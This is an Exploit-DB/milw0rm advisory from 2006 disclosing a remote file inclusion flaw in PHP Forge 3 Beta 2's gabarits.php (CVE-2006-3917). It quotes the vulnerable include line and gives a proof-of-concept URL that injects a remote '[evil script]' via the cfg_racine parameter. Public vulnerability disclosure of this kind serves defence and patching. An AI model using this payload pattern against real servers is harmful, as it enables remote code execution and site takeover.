Lucene search
Virangar SecurityEDB-ID:2058HistoryJul 22, 2006 - 12:00 a.m.
PHP Forge 3 Beta 2 - 'cfg_racine' Remote File Inclusion
2006-07-2200:00:00
Virangar Security
www.exploit-db.com
128
AI Score
7.4
Confidence
Low
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
phpforge3b2(cfg_racine) Remote File Inclusion Vulnerability
------------------------
Virangar Security Team
www.virangar.org >public
www.virangar.net >priv8
--------
Discoverd By : Snake & hadihadi_zedehal
contact : [email protected] ** [email protected]
special tnx 2: A.Nosrati * l0pht.Blackhot * Kouros.virus & all virangar members
greetz:hadi_aryaie2004 * ahmad_virangar2004 * mahtab_e66
---------
bug found in file :gabarits.php
Remote : Yes
Critical Level : Dangerous
web:http://phpforge.oirac.com/
---------
vlu codes:
include_once($cfg_racine."inc/systeme.php");
---------
http://www.victim.com/[patch]/inc/gabarits.php?cfg_racine=[evil script]
--------
See you in Hell!!.....
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
# milw0rm.com [2006-07-22]Related
nvd
nvd
CVE-2006-3917
2006-07-28 00:04:00
cvelist
cvelist
CVE-2006-3917
2006-07-28 00:00:00
cve
cve
CVE-2006-3917
2006-07-28 00:04:00